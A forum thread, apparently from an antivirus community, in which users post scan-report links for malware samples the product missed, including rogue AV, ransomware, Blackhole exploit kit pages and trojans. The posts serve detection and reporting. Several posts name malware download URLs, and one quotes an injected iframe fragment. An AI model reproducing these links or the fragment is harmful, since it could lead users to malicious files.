https://www.virustotal.com/file/f98467ca503ea197e973516818ea256eb48f223a5babccba43237853dd4b0181/analysis/ (https://www.virustotal.com/file/f98467ca503ea197e973516818ea256eb48f223a5babccba43237853dd4b0181/analysis/)
Submited
-
Not flagged: http://vscan.urlvoid.com/analysis/06c257e1bf122b61b5fdf5b2fd8ff69b/Y2xhc3NpY21lbnUtZXhjZWwtMjAxMC1leGU=/
see: http://anubis.iseclab.org/?action=result&task_id=1462de462286de304c14ae5a46796f884
and VT scan: https://www.virustotal.com/url/6676996ba4a9bd5c288515636801cfb3dea6fb88cb4261ca05cf9504a2d15d59/analysis/
Not detected here is ADWARE/Agent.1886490.2 or Trojan.Generic.6670956, also known as Backdoor.Win32.Agent.iba
polonus
-
https://www.virustotal.com/file/7e8bb57ad97ace3aa4a8f3ecaf5538e84b58a06e16569f3f60f190fa3e83f80b/analysis/1328464255/
https://www.virustotal.com/file/b0da44b15ab0097ced6af589437f5ec975cadcb5245a5be4d234aa68f2413f29/analysis/1328465733/
-
Тhe second day there is no detection of threats :( Win32:LockScreen
https://www.virustotal.com/file/36b2a0c387fea7bace73154a2eb68daec0ca8f8d7ba863438b671fcdfdb5da61/analysis/1328557748/
https://www.virustotal.com/file/11d9efbf2d1c34959cee8989b8f3a922c1b5faec71d7f07fcd00c788b9a55fd8/analysis/1328557767/
https://www.virustotal.com/file/be7fc0c6b4358ae6c55fa64e6d617924dffb282259f8f354f06e7dd922995fcc/analysis/1328557780/
-
#Trojan.Karagany
https://www.virustotal.com/file/290853e5d2451bbcba738412efba7f3d50f5e9572a6fb23476e7ba8b966b15fa/analysis/1328630874/ (https://www.virustotal.com/file/290853e5d2451bbcba738412efba7f3d50f5e9572a6fb23476e7ba8b966b15fa/analysis/1328630874/)
Submitted
-
Non detected HTML/Agent.NP, see: hxtps://www.virustotal.com/file/a72d07ac7c8e6a07dc0f0f0c4cb8c24136da5acea1e5dc3e3c6aff9d095fb661/analysis/
see: hxtp://vscan.urlvoid.com/analysis/f382fe3d08efcce6cd54e56071cac771/Y256ejYtaHRtbA==/
reported to virus AT avast dot com,
polonus
-
Not detected, see: htxp://vscan.urlvoid.com/analysis/927ae0659a7cefd8435d9f7b680da729/aW5kZXg=/
reported to virus AT avast dot com,
polonus
-
https://anubis.iseclab.org/?action=result&task_id=1fa86a345dd2a5204cd5b2fe588b79bce&format=html
https://www.virustotal.com/file/f5cc4b10818133d64825d8aaacc3fd2996604a0bd6c33161d209062a156b162c/analysis/
#Fake.AV
Submitted
-
Not detected by avast flagged as BDS/IRCBot.adit.11, re: htxp://vscan.urlvoid.com/analysis/1cd3a366d926ecc90a5ef9a8de9f3be2/ZS1ncmVldGluZ3MtZXhl/
See: htxp://siteinspector.comodo.com/public/reports/316047
reported to virus AT avast dot com,
polonus
-
undetected malware
https://www.virustotal.com/file/495d315808242be519213cc5226e78d96152212c3c54f71f6aad4b7bf1d8da80/analysis/1329499841/
-
https://www.virustotal.com/file/a474534bf4185fc604b66396b69fb3a032c9f47b38bcf5ab4e9104d25cfe1054/analysis/
-
Hi Burkoff,
The threat you mention is as yet still unconfirmed: http://threatcenter.crdf.fr/?More&ID=73847&D=CRDF.Trojan.Trojan.Win32.Spy372115777
Another instance of this malware flagged : https://www.virustotal.com/file/a474534bf4185fc604b66396b69fb3a032c9f47b38bcf5ab4e9104d25cfe1054/analysis/
polonus
-
Not detected facebook trojan:
https://www.virustotal.com/file/0b93e830d387218e628b18509f8e7bd0552e231224e23695c8b1582e4507016d/analysis/1329642980/
Sent via virus chest.
-
FakeAV
https://www.virustotal.com/file/c426ee3d74fdbbc00a5eab8b22ed8a911d7a1337c0b925fa51dd6c7adce0c922/analysis/1329644318/
sent to avast!
-
CRDF.Trojan.Dropper.
https://www.virustotal.com/file/7d8342b53cc049baff60ad69aaa7c14e5a8aef601a1e497506399c10dc08d6c5/analysis/1329644421/
Not detected.
Sent to avast!
-
CRDF.Malware.Win32.PEx.Delphi
https://www.virustotal.com/file/06d28a88c7186156ea17612baf79a80f124e6e961de8e700cc988c7890bf4cca/analysis/1329644585/
Not detected sent to avast
-
https://www.virustotal.com/file/e268ce5b04325c3cc719b732edf2d5c3217023994a8a6c9908b3bba2251f90c6/analysis/1329644885/
Not detected.
Sent to avast!
-
Last sample from me today :)
https://www.virustotal.com/file/40e57c819409a025de6a4596e18b156521f31e19c50dc878f5479f724c4753d2/analysis/1329644939/
Not detected.
Sen to avast!
-
@true indian: Please summarise your findings in one post..!! Thanks.
-
@true indian: Please summarise your findings in one post..!! Thanks.
Sorry asyn i am currently Not at home and i am doing this from a another machine.
-
@true indian: Please summarise your findings in one post..!! Thanks.
Sorry asyn i am currently Not at home and i am doing this from a another machine.
Well, not sure why posting from another machine would make a difference..??
Anyway, please remember it for the next time. ;)
-
CaM.Malware.Win32.PEx.C.91167921839
https://www.virustotal.com/file/8d7abf40f309ae3c3dba5b6ce4c588a8ec4112f297e6a6369b8883e2ee2db4cb/analysis/1329645931/
Not detected... sent to avast!
TR/Offend
https://www.virustotal.com/file/3bd58f2bca88b72d3d8c158913eddaab4dc34f7203608108d38253a69dd10564/analysis/1329646147/
Not detected sent to avast!
-
FakeAV
https://www.virustotal.com/file/c426ee3d74fdbbc00a5eab8b22ed8a911d7a1337c0b925fa51dd6c7adce0c922/analysis/1329644318/
sent to avast!
First seen by VirusTotal 2010-01-05 05:03:03 UTC ( 2 year, 1 month ago )
Sigcheck
publisher................: Trend Micro
product..................: HouseCall
internal name............: HouseCall
copyright................: Copyright (c) 2009 Trend Micro
signing date.............: 11:00 AM 12/25/2009
original name............: HouseCall.exe
signers..................: Trend Micro, Inc.
VeriSign Class 3 Code Signing 2004 CA
Class 3 Public Primary Certification Authority
file version.............: 1.0
description..............: Trend Micro HouseCall updater and launcher
-
CRDF.Malware.Win32.PEx.Delphi
https://www.virustotal.com/file/06d28a88c7186156ea17612baf79a80f124e6e961de8e700cc988c7890bf4cca/analysis/1329644585/
Not detected sent to avast
hmmmm....what do you think ::)
First seen by VirusTotal 2007-09-11 11:18:56 UTC ( 4 year, 5 months ago )
-
Hi Pondus,
Lucky for true indian, the malware is still with us: https://www.virustotal.com/file/06d28a88c7186156ea17612baf79a80f124e6e961de8e700cc988c7890bf4cca/analysis/
Last given at MalcOde on 2012-02-18, actual status not given,
polonus
-
https://www.virustotal.com/file/af96e40a254c99038610bc5a0df5b47e708511aba23d09f5b0b1f0b6d9c7561e/analysis/1329935605/
-
Hi liosant,
What you gave is an undetected Zeus trojan detection, dated 2012/02/22_18:15 from stratoserver dot net.
See: htxp://vscan.urlvoid.com/file/1655be4bd82fb8db376336c604f945a0/bWQ1dnJibmktZXhl/ [none flagged it]
Did you send it to virus AT avast dot com?
polonus
-
This trojan backdoor is not detected by avast: https://www.virustotal.com/file/719702c00da3f540f2e7a43b0dcd031a7ca2b6bd79d06e90dbd5ff8b7426b6ff/analysis/
See: htxp://vscan.urlvoid.com/analysis/516025d2f8a55e5c93d138b75e594962/Y29weS1kdmQtbW92aWUtbm93LWV4ZQ==/
anubis analysis: htxp://anubis.iseclab.org/?action=result&task_id=18421afa1aaadf3149d3edafd7a43ad09
reported to virus AT avast dot com,
polonus
-
TR/Dldr.Delphi.Gen not detected by avast see: http://vscan.urlvoid.com/analysis/21a42bf899a01b32b23266a6eb3fac5a/Ym9sZXRvLWNsaWVudGUtaWQtMjU2OC16aXA=/
Sent to virus AT avast dot com,
polonus
-
Exploit.JS.Blacole not detected by avast
See: htxp://zulu.zscaler.com/submission/show/1e746713b9ddd676c658e51d7fba651f-1330733871
and htxp://vscan.urlvoid.com/analysis/e889828042cb5e1ba61b06ffcdc48bb7/aW50LW1hcmtldC1odG1s/
see: htxp://urlquery.net/queued.php?id=27509
Says: Detected Blackhole exploit kit v1.2 HTTP GET request
- Detected Live Blackhole exploit kit
reported to avast, via virus AT avast dot com,
polonus
-
See: htxp://zulu.zscaler.com/submission/show/8798b69cb50a0e2f38cc81234c6cffdf-1330878473
and hxtp://vscan.urlvoid.com/analysis/25c96c26895da3f701c2714a09d9fda7/Y2FzdGxlLWV4ZQ==/
hxtp://www.toppopgames.com/castle.exe/{app}\Update100.exe infected with Trojan.MulDrop.49139 aka TROJ_DROPPER.BS
polonus
-
https://www.virustotal.com/file/916e1957c18f845ff7b674624bed2b2942b9e2c42102bfd4524a78ad8ad60803/analysis/1331143828/
https://www.virustotal.com/file/4253307f888b997acc04aeb55b174a1b8d83c215087f3e9f5ade7da1f217baf5/analysis/1331143846/
https://www.virustotal.com/file/64d586cbe6bcddc12902e88d46451808f4141644fcbc438bf1b73e2be78f0fc1/analysis/1331144147/
For a long time do not add to the database.
Sent to avast!
-
Hi Dim@rik,
Thank you very much for adding to avast detection,
polonus
-
See: htxp://vscan.urlvoid.com/analysis/be551a9b2f4723e9b83b72135eb93153/aWRmb2xkZXJwcm90ZWN0b3JzZXR1cC1leGU=/
See: htxp://zulu.zscaler.com/submission/show/cf79a66f79c459dad2fff3da61d07b4a-1331213009
See: hxtps://www.virustotal.com/file/7985035c8fdc8df0a33b207d23239684aef662f252a5d38939cf17b9dc91aef4/analysis/
reported to virus AT avast dot com,
polonus
-
Trojan downloader not detected? See: htxp://zulu.zscaler.com/submission/show/d4d9d08f1f65746d58671660a7884484-1331540714
See: htxps://www.virustotal.com/file/f581cd8afd8720e57d3f72ad8e5c20929fb1355ea958aa054d6615c5788dffa8/analysis/
See:
htxps://www.virustotal.com/file/f581cd8afd8720e57d3f72ad8e5c20929fb1355ea958aa054d6615c5788dffa8/analysis/1331541685/
reported to virus AT avast dot com,
polonus
-
https://www.virustotal.com/file/5000f2f8eb553bde47a2fff77b9658c3d1fc187c10981ca6b842017f03e4eeb0/analysis/1331573829/ (https://www.virustotal.com/file/5000f2f8eb553bde47a2fff77b9658c3d1fc187c10981ca6b842017f03e4eeb0/analysis/1331573829/)
https://www.virustotal.com/file/22cc879095bbcb09731d5f7941d15b6b2e4995ad92ef742eeef941c7b79ec4cd/analysis/1331573841/ (https://www.virustotal.com/file/22cc879095bbcb09731d5f7941d15b6b2e4995ad92ef742eeef941c7b79ec4cd/analysis/1331573841/)
https://www.virustotal.com/file/bd8c7ee2a2d68ba233f41d4703356301bf0244cb0fd0b9494133d01a74c3de62/analysis/1331573852/ (https://www.virustotal.com/file/bd8c7ee2a2d68ba233f41d4703356301bf0244cb0fd0b9494133d01a74c3de62/analysis/1331573852/)
-
Not detected by avast, see: htxp://zulu.zscaler.com/submission/show/99a787d447fffe9623a635f45e8c8a8e-1331653986
and https://www.virustotal.com/file/9cd2c476b012a1b59176351d19e2a90910dd412011c4f2225567d572cbc9b319/analysis/
see: http://zulu.zscaler.com/submission/show/99a787d447fffe9623a635f45e8c8a8e-1331653986
htxp://qsbwq.info/Aktuelle-Rechnung.exe infected with Trojan.FakeAV.10767
reported to virus AT avast dot com,
polonus
-
Possible virus sent to avast!
https://www.virustotal.com/file/b0dc81eb634d259a26309ae0a13394a9baa3b51d68f480fe630bf15627beb7ff/analysis/
-
Nor detected by avast yet: htxp://www.malware.com.br/cgi/search.pl?id=VHJvamFuLURvd25sb2FkZXIuV2luMzIuQXV0b0l0LnVk
See: htxps://www.virustotal.com/file/67778758c650ae8d806db50201c6dd2f55f5f9c5452b6759e48e4bea08c788dd/analysis/
reported to virus AT avast dot com,
polonus
-
https://www.virustotal.com/file/deb3b1435596eea7911462abc7320284e6690548ac065f27f38bab9b61c8ac37/analysis/1332432938/
no detected
sample sent.
-
Not detected: htxp://zulu.zscaler.com/submission/show/97a41db3569e17f3e53f1813cc2dd6fe-1332525884 has TR/Crypt.XPACK.Gen
see: https://www.virustotal.com/file/9b1d23ccee1aa9804c2f4703715f1e5f718dd68abba6ccbf2fd75df184b40557/analysis/
reported to virus AT avast dot com,
polonus
-
Detected by Malwarebytes as Trojan.Zbot.AHGen
uploaded to superantispyware ;)
-
Not detected by avast HTML.Redirector, see: htxp://zulu.zscaler.com/submission/show/dfea7c633f3ebd6f32209496a6e3aa8a-1332623766
see: htxp://vscan.urlvoid.com/analysis/30621fc99bdf2160782295db247a26e3/aW5kZXg=/
reported to virus AT avast dot com
polonus
-
Not detedted TR/Dldr.Delphi.Gen: htxp://zulu.zscaler.com/submission/show/da28c9bae449230b256f0dac6379ed8d-1332854900
and
htxps://www.virustotal.com/file/e7609daa27a2a1756c2c6dacc7909bd1de8e96d11d55c4f238140b47fe48731b/analysis/
reported to virus AT avast dot com,
polonus
-
Found by Chabbo ;)
From Fake scan URL (will not post that here)
VirusTotal
https://www.virustotal.com/file/1dde88e37d0c2bdb21a7e009c43e6adb0745d4dbf2f27c69f1c900aeb6167b97/analysis/1332966051/
Metascan
http://metascan-online.com/results/ht9m21ps66km6k536laohr86pn0mv4iu
Malwarebytes detect as - Rogue.installer.SFXGen1
Sendt avast lab ;)
-
not detected Winlocker (blue screen with sms sending)
https://www.virustotal.com/url/92342723de2defb4c5e79b12582aa304e781d51c0c94a2a532c1182088eb0d94/analysis/1333218729/
-
All files sent to avast via chest and also reported at virus@avast.com.
https://www.virustotal.com/file/53ed4270865af043f1760343d260057f136bbc1e048af5de2498cdecf50fd229/analysis/
https://www.virustotal.com/file/ef2c6266f16f9bc2820f8983562878585fec524e521a0508c5ab7a54bbbdbd68/analysis/
https://www.virustotal.com/file/cd03fdc07dda157dcd6cb0f1c569e379af2850fd86d7c78169420aca251a37a5/analysis/
https://www.virustotal.com/file/0f824b88d9388c4cb01d50cc5a8c2976106eb37f1cb1f4f255194fbdf32539e4/analysis/
https://www.virustotal.com/file/7ef67c670d63e345e3d3978e992554a0d5920fdbf5151c5f4ac154a3abae8666/analysis/
https://www.virustotal.com/file/c612f01e7ab4bb8a2be334184979630a914d60060b3dd8e3aa9005eb637e4a0a/analysis/
https://www.virustotal.com/file/c612f01e7ab4bb8a2be334184979630a914d60060b3dd8e3aa9005eb637e4a0a/analysis/
https://www.virustotal.com/file/54f7595a44f846f1abbc333d0901a266e1948d99f5757bdaceae5a03ac764b71/analysis/
https://www.virustotal.com/file/080340441fbbb9738e770b4b7604432c9745ae051309dd9ddc8e6b896b120bce/analysis/
https://www.virustotal.com/file/30b4eb6bfc45d7734a59b8c80638f1191d5edd85936a7e8c33df4a8cf2796df2/analysis/
https://www.virustotal.com/file/f32b491aaf3768cb5d58cd0f0c41950c190841aca358a8ffe7caeec40e850bf9/analysis/
https://www.virustotal.com/file/5c396eea9dd6c4b48e69afc20ac8db16b9fcf29b08d51f73c4140443be9a7be0/analysis/
-
Rogue:Win32/FakePAV aliases fake antivirus 2012
uploaded from chest and reported to virus@avast.com
see:
https://www.virustotal.com/file/6ba2818cf9124a1c323cfa31f76df1b9251a66d2883e8d5da14fa2e0693f7751/analysis/1333510969/
-
Not detected by avast: htxp://zulu.zscaler.com/submission/show/544eabcc9d60a9ff34630bca97b03529-1333549339
and htxps://www.virustotal.com/file/c1ff8f8af97cc54baca50aace421ec86b52601808a092a51f13ca01158f191e6/analysis/
reported to virus AT avast dot com,
polonus
-
TR/VB.Downloader.Gen -Not detected....
https://www.virustotal.com/file/811a6db7ffc22a7c576df9c16c0e69dfd99747c83a07d78f17a0da902f076a48/analysis/1333691557/
TrojanSpy.KeyLogger.cqsj-Not detected.
https://www.virustotal.com/file/69115de3bada409ff29936c5351139e30c9688302efeabc92a3d7428c5d159f2/analysis/1333691953/
sent to avast!
-
Not so sure about that one.....( acceleratedvdtoipod.exe ) ;)
Sigcheck
publisher................: Accelerate Software Co., Ltd.
copyright................:
comments.................: This installation was built with Inno Setup: -http://www.innosetup.com
file version.............:
description..............: Accelerate DVD to iPod Converter Setup
First seen by VirusTotal
2011-12-08 08:38:30 UTC ( 3 måneder, 4 uker ago )
-
Not so sure about that one.
sorry pondus...i grabbed this one from a disinfected pc :)
-
suspected piece of malware.
https://www.virustotal.com/file/9165b7407f6cf386c1c807e458a9150884f083aa25c67339bd62c42978dfd349/analysis/1333693637/
sent for analysis
EDIT: somoto adware not detected from past 2 weeks :'(
https://www.virustotal.com/file/54f7595a44f846f1abbc333d0901a266e1948d99f5757bdaceae5a03ac764b71/analysis/1333693975/
sent for analysis
-
Trojan.Win32.Generic.1270F32B
https://www.virustotal.com/file/432ec13b162c9343598c7b8ac44780a420c86bd985d2bcfb9c40fe6b0d7d8d1e/analysis/1333694646/
DR/VB.kqn
https://www.virustotal.com/file/91011b0b63395ff05f398acf9b574623fa09ac73274ddb8a90b10c00f0e6739e/analysis/
EDIT: https://www.virustotal.com/file/5197286e3c5d2df5be0bc74464d71a829db8af5243c47d4a920e11d49d8da46b/analysis/
sent to avast
-
TR/Chifrax.
https://www.virustotal.com/file/a42b7b16d9b1887486d13b7f82a83b6a8617d228d86e0f25b69efa9c43604ae5/analysis/
TR/Offend.KD.469180
https://www.virustotal.com/file/0282225de752d60254a97934c292d542402e471ba139ab1d2ab400eb06e96406/analysis/
WS.Reputation.1
http://www.virustotal.com/latest-report.html?resource=dd8ce2b806edf4c303f7a893886f546d
Trojan.KeyLogger.12238
https://www.virustotal.com/file/5197286e3c5d2df5be0bc74464d71a829db8af5243c47d4a920e11d49d8da46b/analysis/
sent to avast!
-
DIPG.exe:
https://www.virustotal.com/file/8c9798eaff7455e42563fdf43f9d974e2e4c9f9d4c6075430e2ec4154ea2900e/analysis/1333704925/
unknown exe
https://www.virustotal.com/file/9d2f35a89366c6c7460ab2cad14ba25c9a6d4041410e1a927c284f8a927568c7/analysis/1333705527/
sent for analysis.
-
https://www.virustotal.com/file/aa95ab83464a12bab687bcef7ab5bfc5bd98eec8b29b6c7ae83d55a2cd1323ff/analysis/1333777890/ (https://www.virustotal.com/file/aa95ab83464a12bab687bcef7ab5bfc5bd98eec8b29b6c7ae83d55a2cd1323ff/analysis/1333777890/)
-
Windows Processes Accelerator Rogue
Not detected here: https://www.virustotal.com/file/c88842eb9a89c4c675656f0671113e57a3eeeff36389dd30a23d2583341c0682/analysis/
reported to avast
-
See: htXp://sitecheck.sucuri.net/results/http://cimislia.net
See: htXp://siteinspector.comodo.com/public/reports/show_log?id=544832 But I get a 404 File not found.
Missed here: htXp://zulu.zscaler.com/submission/show/9503176b1afd09c1b82a2fb834476a0f-1333885620
and missed here: htXps://www.virustotal.com/url/cc2ce5819bb48ae41d18d4030dbe91f05556c758cbf1a572985802c6701bee24/analysis/1333885686/
links to suspicious domain: document.write('<iframe src="htXp://link.link dot ru/show
reported to virus AT avast dot com
polonus
-
Hi true_indian,
You grabbed reports from here, for instance: for the Windows Processes Accelerator Rogue you gave
: http://forums.comodo.com/comodo-internet-security-cis/submit-malware-here-to-be-blacklisted-2012-no-live-malware-t80088.0.html;msg596587
polonus
-
Hi polonus no they are not from comodo forum...
Windows Stability Maximizer Rogue
https://www.virustotal.com/file/61ede6100349ee25dcb03d5872d92a388a1636a817d5852423671dcb75606113/analysis/1333944810/
Reported to avast
-
https://www.virustotal.com/file/b8fbdae4a73c2c5961923966fbbc3d1f5e80451fe62e2dec2915340ec004e2db/analysis/1334039907/ (https://www.virustotal.com/file/b8fbdae4a73c2c5961923966fbbc3d1f5e80451fe62e2dec2915340ec004e2db/analysis/1334039907/)
-
Windows Antibreaking System Rogue
Not detected...
https://www.virustotal.com/file/c48b0a6509f38869e9fb0a72a9e1a34294037b14e4ef5fa2200b08c0f997ad61/analysis/1334210015/
Reported to avast! 8)
-
Missed trojan.Zlob variant:
htxp://zulu.zscaler.com/submission/show/da0256c76b0000392e0f5ff57c8170fc-1334249398
and
htxps://www.virustotal.com/file/c36d51d5b8185a307171e73720c40b4b6bfbfd1e5186cf39470701bace049a88/analysis/
reported to virus AT avast dot com
-
SecurityTool.T also known as rogue windows cure
https://www.virustotal.com/file/aec468db98c73336f3a6a83a59561a0a3292801d9ce99ea49418b5845a95acda/analysis/1334249705/
reported from chest ;)
-
Hi true_indian,
Why report this one as it is updated that many times and the malware will survive just over an hour before it is being closed again, better to have a web- or netshield block? So, senseless action i.m.o.
polonus
-
Why report this one as it is updated that many times and the malware will survive just over an hour before it is being closed again, better to have a web- or netshield block? So, senseless action i.m.o.
Well,there is no web or net shield block for this...more ever it is a rogue and it is a critical one even MBAM Detects it we need that in tha avast database ;)
-
Hi true_indian,
How can you create detection for a piece of malware that does not respond any longer or has been closed and what for? You are not knowing what you are talking about. And if you have detection for another older variant what good would it do on the next version? These are generic unclassified malware detections,
polonus
-
Reported to virus AT avast dot com a variant of W32 solimba
htxps://www.virustotal.com/file/3daef7c43e3d4cfd0f706c155f216c0bb5ea1fc1637e67b6c815daf5fa5231cc/analysis/
and
htxp://zulu.zscaler.com/submission/show/5b1c27f8a0bacb574ba5bdd5289642bb-1334505055
polonus
-
see: htxps://www.virustotal.com/file/73f9128f37aeb8d1282b8750df727b5fab39e7eb3700361979ee2d9e358714ad/analysis/
and
htxp://zulu.zscaler.com/submission/show/d2dd47258549965563800957c3bbf034-1334509595 (TR/PSW.Fareit.E)
reported to virus AT avast dot com,
polonus
-
See: htxp://zulu.zscaler.com/submission/show/310bdfbdd56857fee5761037a9448c58-1334825007
VT: htxps://www.virustotal.com/file/04e9a0f7a102418967eae889b0ff8e8725f51d81bad14fc8fa6f7b0cf4c01d89/analysis/
reported to virus AT avast dot com,
polonus
-
Undetected malware (Trojan?) https://www.virustotal.com/file/8d6a364bf9aff67cd1067ab47079223b6ffe21d93e4e90147d6a15710c19e86f/analysis/1335557018/ (https://www.virustotal.com/file/8d6a364bf9aff67cd1067ab47079223b6ffe21d93e4e90147d6a15710c19e86f/analysis/1335557018/)
-
Undetected malware (Trojan?) https://www.virustotal.com/file/8d6a364bf9aff67cd1067ab47079223b6ffe21d93e4e90147d6a15710c19e86f/analysis/1335557018/ (https://www.virustotal.com/file/8d6a364bf9aff67cd1067ab47079223b6ffe21d93e4e90147d6a15710c19e86f/analysis/1335557018/)
did you send the sample to avast?
-
See: htxp://zulu.zscaler.com/submission/show/6d51102e1c5923a997de688f1ff3871b-1335548167
and htxp://vscan.urlvoid.com/analysis/92a816b15e958aee9c26d6a756c0c86b/ZG5mLWV4ZQ==/
TR/Dldr.Delphi.Gen reported to virus AT avast dot com,
polonus
-
Quote from:Pondus on Yesterday at 08:09:28 PM
did you send the sample to avast?
Of course I've sent.
-
Detection missed for Trojan.SuspectCRC, see: htxp://zulu.zscaler.com/submission/show/3b1e347a8ee11ab1061bf2fd647083ff-1335647081
See: hxtp://vscan.urlvoid.com/analysis/dae13e232acaa1cce12d4b608de01540/dXBkYXRlLXVwZA==/
VT results: htxps://www.virustotal.com/file/bc675a110dd06174b5b2e1102576fd6becba71b91b9c0f8c64d6073f2709c8cb/analysis/
reported to virus AT avast dot com,
polonus
-
https://www.virustotal.com/file/38bb8656c63946ece05680a10a71b660cc47dab09a5d5ad82dd1a4befc2cbeb5/analysis/1335704355/ (https://www.virustotal.com/file/38bb8656c63946ece05680a10a71b660cc47dab09a5d5ad82dd1a4befc2cbeb5/analysis/1335704355/)
https://www.virustotal.com/file/4e34f75037e77d558b6faba0368bafec5eeabdd24f586b1f6bdb7be4c9301434/analysis/ (https://www.virustotal.com/file/4e34f75037e77d558b6faba0368bafec5eeabdd24f586b1f6bdb7be4c9301434/analysis/)
-
See: htxp://zulu.zscaler.com/submission/show/b17a92cfbde005a450a6866f77668513-1335719417
Found here: hxtp://wepawet.iseclab.org/view.php?hash=9780abb65c19255633e7a5bd7fb25377&t=1335719822&type=js
See: hxps://www.virustotal.com/file/374a11472c3d4a869eaef8bd322ed0f73f6f7b2a8cb8d41632fb385ff798e786/analysis/
reported to virus AT avast dot com
polonus
-
Trojan downloader Banload variant: htxps://www.virustotal.com/url/9c4b70ddfea087abed2b35d8ad1d809d5004de944baa9c5aff5353b61fb950ff/analysis/1335964615/
see: htxps://www.virustotal.com/file/a25731ff295e96bb082faacd2582d7b803908a65e487ab02185c69272d60c86c/analysis/
reported to virus AT avast dot com
-
Not Detected Live BlackHole exploit kit
virustotal
https://www.virustotal.com/file/ac17aca352ae40dfe1dd39e80ddf2fadb5c43119fd48ea12684397843e442786/analysis/1336224968/
urlQuery
http://urlquery.net/report.php?id=51033
sucuri
http://sitecheck.sucuri.net/results/http://seattle-carpet-repair.com/wp-includes/ps.html
Zulu analyzer
http://zulu.zscaler.com/submission/show/cfadbe4214ea2c512e7b438f8f0d79b8-1336225005
sendt avast lab
-
Hi Pondus,
Good find, my friend. I went to that site with malzilla and took the attached picture of the malicious code.
Detected were:
- Detected BlackHole exploit kit HTTP GET request
- Detected Live BlackHole exploit kit
- Detected malicious injected iframe
That is why this stays my favorite URL scanner to verify BlackHole issues: http://urlquery.net/report.php?id=51148
And again it is of the utmost importance for all users here to keep their OS and 3rd party software fully updated
and fully patched, so blackhole could not do any harm via vulnerable software exploits to their comps.
Use the online scanner here to see if you are not vulnerable: http://secunia.com/vulnerability_scanning/online/
polonus
-
Sent in an obvious phishing e-mail.
Came as file, not a link. Should really be picked up, if possible.
https://www.virustotal.com/file/0243b059675aa4853cb1ec73ff1e0407509713307bec8415cdd70c167538adb9/
Only Sophos detects it as Mal/Phish-A
-
Attack log reported to virus AT avast dot com: htxps://www.virustotal.com/file/58f30f9cd84db12c798b8a5f2b562dae257ec8fb834343bbbae0ca416f8c8e8a/analysis/1336351748/
see: hxtp://sakrare.ikyon.se/log.php?id=38752 (log report) typically found for a Blackhole attack as Trojan/Script.Gen, Mal/Iframe-W, JS/Exploit-Blacole.l,
polonus
-
see: hxtp://zulu.zscaler.com/submission/show/be820963ec680424e249fe3e3526fa21-1336927485
and htxp://vscan.urlvoid.com/analysis/26aab2dcab242492e53be0256e4c7d1c/aW5kZXg=/ HTML/Infected.WebPage.Gen2 aka Trojan.JS.Iframe.BDQ
not detected and reported to virus AT avast dot com,
polonus
-
Not detected here: https://www.virustotal.com/file/3635144a0bbf5cf99087114adcc03782f2c958534d2a823aaa68fa357ce09153/analysis/1336989764/
Trojan-FakeAV.Win32.SecurityShield.bfa
reported to avast! ;)
-
Trojan.FakeSysDef. Rogue Data Recovery
http://r.virscan.org/report/e2bd222bd7cb781c511fde03b661aaf7.html
reported for analysis ;)
Fake scan URL [Will not post it here] [Found in my e-mail Junk]
reported to avast
-
Trojan Ransom
https://www.virustotal.com/file/8b09cf7b...336884057/
reported for analysis ;)
(https://www.botnets.fr/images/thumb/0/0f/Reveton_2_AT.png/800px-Reveton_2_AT.png)
-
Backdoor.Win32.ZAccess.lzn
https://www.virustotal.com/file/91badc3df93645b303a381abcb0ca94d/analysis/
reported to avast!
-
roguescanfix_setup.exe
https://www.virustotal.com/file/8eb24d4ef3a8d349aee103c8c2d6a3cfa7f06ed8773552435b2baf30c70987a2/analysis/1336994276/
reported to avast! 8)
-
Not detected: htxps://www.virustotal.com/file/0fc8b26edb1f20c4e9048b9e49322475a6c67017d8496d25e50e63add10443be/analysis/
see: htxp://zulu.zscaler.com/submission/show/b9c0b18ba77ccc2f4f65e6f8d1c3eb87-1337028150
reported to virus AT avast dot com,
polonus
-
Rogue Super scan 4
https://www.virustotal.com/file/dc01f0835207ad7264284e20b0c02048f8705c813c2c8d7071ed2f653d0209aa/analysis/
Reported for analysis ;)
-
- Detected BlackHole exploit kit HTTP GET request
- Detected Live BlackHole exploit kit
http://urlquery.net/report.php?id=54555
http://zulu.zscaler.com/submission/show/57563010e557ca01c429eeefa48933af-1337158962
Detection missed by avast! so sent to virus lab. ;)
Ransom GEMA - German
https://www.virustotal.com/file/911740ab567a7ac3ea3b68d64b21fc4205a24775119a5559b497e592ef5890ec/analysis/
sent to avast!
-
Rogue.Win32.RegistryVictor.
https://www.virustotal.com/file/92a4c559f6d32b24f3b3d2e1eae2ab415e42cc4dda114234df5f7d608d1767ae/analysis/1337165386/
reported to avast!
-
Trojan-Ransom.Win32.Blocker.gzn
https://www.virustotal.com/file/142cd19226855746534068a12c2cda8cb5480501a1452616878c0054301a8b9b/analysis/1337183641/
Reported to avast! ;)
-
French #Ransom - Trojan:Win32/Ransom.FL
https://www.virustotal.com/file/142cd19226855746534068a12c2cda8cb5480501a1452616878c0054301a8b9b/analysis/1337236334/
Reported to avast! ;)
-
Backdoor.Win32.Ruskill.fgj
https://www.virustotal.com/file/f2b51cbb2d5ebcbe244be0757259f76312cad2ae3b69fb1cb70f22ec8a5f16f6/analysis/
Reported to avast!
-
Trojan-PSW.Win32.Tibia!A2
https://www.virustotal.com/file/f7a7ba8f61821f3d783a31d3180947a5dbddd1e849d40e0e879ad44d43425343/analysis/1337239531/
Trojan.Generic.KD.623383
https://www.virustotal.com/file/b1427b1e00f422d56688901e9444bf85f2e945374319eadf951f6e94a8e2de95/analysis/
Gen:Variant.Barys.2209
https://www.virustotal.com/file/94560f73d8ef265ad02fc91881e09b7f746c9e16e7636740137835d39a6213dc/analysis/
TR/Fraud.Gen4
https://www.virustotal.com/file/34a9848c7fc4a7fb304e597cde45efbf13fd4b1aed420646ce6d322fe781e5ea/analysis/
Reported to avast!
-
Trojan.Win32.Autorun.dm (v)
https://www.virustotal.com/file/84c90377421a63cfe767c17d7079877b7dab0f4c63d6b0d9f87ddb48e7a50360/analysis/
Reported for analysis
-
Hi true indian,
Could well be that bmp.exe is found up by avast flagged as PUP risktool. For safe variants of that media player tool see: htxp://www.backgroundtask.eu/Systeemtaken/taakinfo/30932/BMP.exe/
htxp://www.runscanner.net/lib/bmp.exe.html and
where this Chinese active malcode is being flagged as TR/FlyStudio.AI.1129, see: htxp://zulu.zscaler.com/submission/show/002b26f390d7be7416d1574ab05c8298-1337262299 avast does not detect it yet (possibly as PUP when run): hxtp://vscan.urlvoid.com/analysis/0cb2f654fd22256efa7ae84f2b8c9625/Ym1wLWV4ZQ==/
